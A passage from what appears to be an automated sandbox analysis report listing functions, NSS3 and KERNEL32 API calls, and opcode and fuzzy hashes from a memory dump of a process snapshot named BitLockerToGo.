                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
                                                                                                                                                                                                                                                                                                                                                          • String ID: %_ml
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2877228265-1159713028
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 86852a99c7d6a6408d9d7c267d929606fed28a90d2d864f00e18e9caba50a56a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e451e01948f30bd51c685d03492bebf533d482cfb0c39c9ec42fcc1625e3dd7e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86852a99c7d6a6408d9d7c267d929606fed28a90d2d864f00e18e9caba50a56a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79F0E5B2E0271497EA109A15EC00B9377ECAB0175DF448475EC1A97B42E335F8058BED
                                                                                                                                                                                                                                                                                                                                                          Function 6C6B1D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C6B1D8F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C6B1DA6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C6B1E13
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6B1ED0
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 84796498-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4b8b7aca68116e79cf1b7b6666a4e420f10c71f335856417a6287d2f9c4e24b5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ae7dff3adbdeaa08b741d6ad32e5a3c6dcabfea5ec194d96af997eaad351c190
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b8b7aca68116e79cf1b7b6666a4e420f10c71f335856417a6287d2f9c4e24b5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19516875A00309EFDB10CF98D884BAEBBB6FF49308F144129E819AB750D731E956CB94
                                                                                                                                                                                                                                                                                                                                                          Function 6C704FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C5E85D2,00000000,?,?), ref: 6C704FFD
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C70500C
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7050C8
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7050D6
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4101233201-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b0743f4a20ad076e12419e2af18cd5f62591208a63bcc583edaaa9c1b603fb2e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0741A3B2A402158FCB18CF28DCD179AB7E1BF4431871D466DC84ACBB02E779E891CB95
                                                                                                                                                                                                                                                                                                                                                          Function 6C75A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C75A662), ref: 6C75A69E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75A690: PR_NewCondVar.NSS3(?), ref: 6C75A6B4
                                                                                                                                                                                                                                                                                                                                                          • PR_IntervalNow.NSS3 ref: 6C75A8C6
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C75A8EB
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C75A944
                                                                                                                                                                                                                                                                                                                                                          • PR_SetPollableEvent.NSS3(?), ref: 6C75A94F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 811965633-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0cb23450aa82c6d19fa0eda16e80346a6c9d068484a69006648dabf38a493619
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 74fc7264efa8766925ff6221d6549dd26077fc4951d891af5fd869ec1a7a5fc0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cb23450aa82c6d19fa0eda16e80346a6c9d068484a69006648dabf38a493619
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B414BB4A01A129FC704CF29C684966FBF5FF48328755857AD449CBB11EB31F860CBA0
                                                                                                                                                                                                                                                                                                                                                          Function 6C717DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C717E10
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C717EA6
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C717EB5
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C717ED8
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4101233201-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 962d0269040d11f4d372fe1d00472ea429b3befefee6a46b1316a94cc54ed057
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF31C4B1A001158FDB04CF08CD9489ABBE6BF8831871E8179D8085BB11EB75EC55CBD1
                                                                                                                                                                                                                                                                                                                                                          Function 6C646C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C646C8D
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C646CA9
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C646CC0
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C768FE0), ref: 6C646CFE
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2370200771-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: adcb596f18e38229688b341bc5f982d12fb90266e0bcd1eefa8ef2918c891dee
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bd0cf3831730787afaf48cbb72eff160ce61cfd7c18bbc91f60ff7eeab203fb4
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adcb596f18e38229688b341bc5f982d12fb90266e0bcd1eefa8ef2918c891dee
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86318EB5A002169FEB08DF65C891ABFBBF5EF45348B10842DD905E7700EB71D905CBA4
                                                                                                                                                                                                                                                                                                                                                          Function 6C754F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C754F5D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C754F74
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C754F82
                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C754F90
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$CreateErrorFileLast
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 17951984-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e88853ad05051a3cc286083f36f824d333c84ce706f35bef313091539a2e5e42
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0e6eea615a2048b141a90a4139a3b9e1491e07dc11eb258bfb5173d028e78fe0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e88853ad05051a3cc286083f36f824d333c84ce706f35bef313091539a2e5e42
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F315775A002094BEF00CF6CDD85BDFB3B8FF45348F480238E815A7280DB35A92586A1
                                                                                                                                                                                                                                                                                                                                                          Function 6C69DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C69DDB1,?,00000000), ref: 6C69DDF4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C69DDB1,?,00000000), ref: 6C69DE0B
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C69DDB1,?,00000000), ref: 6C69DE17
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C69DE80
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3725328900-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 98d918662ae8dbffb4a157e11fc3280ef9ad321082edac89f2376adb2b2adf13
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3531B4B5901B439BE700CF5AD880692F7E4FFA5318B24823AD81D87B41EB71F5A5CB94
                                                                                                                                                                                                                                                                                                                                                          Function 6C6B2880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • NSS_CMSEncoder_Finish.NSS3(?), ref: 6C6B2896
                                                                                                                                                                                                                                                                                                                                                          • NSS_CMSEncoder_Finish.NSS3(?), ref: 6C6B2932
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6B294C
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6B2955
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Encoder_Finish$Arena_FreeUtilfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 508480814-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 27ec97d3b5c7565971ecc4fbef1ff1f4e2341508e0c5a67c30c4770c12a7c293
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fcfd9df7abd0fb7dab2ee6b14b027660a14c4ed1869578a196e4bc58968a0db4
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27ec97d3b5c7565971ecc4fbef1ff1f4e2341508e0c5a67c30c4770c12a7c293
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F21C4B66006009BE7209B26DC09F4777E9AF85358F090538E45D97B61FB72E828875D
                                                                                                                                                                                                                                                                                                                                                          Function 6C684FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C68B60F,00000000), ref: 6C685003
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C68B60F,00000000), ref: 6C68501C
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C68B60F,00000000), ref: 6C68504B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,00000000,?,6C68B60F,00000000), ref: 6C685064
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValuefree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1112172411-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fe1274bd5405677ad4e2c84a5620f2c5095d078987e3851db26f19bdd0ee6193
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8bb96e73cbc86d698978ea138fb4aed6494d95e266cc5b169424f59d52c2be0e
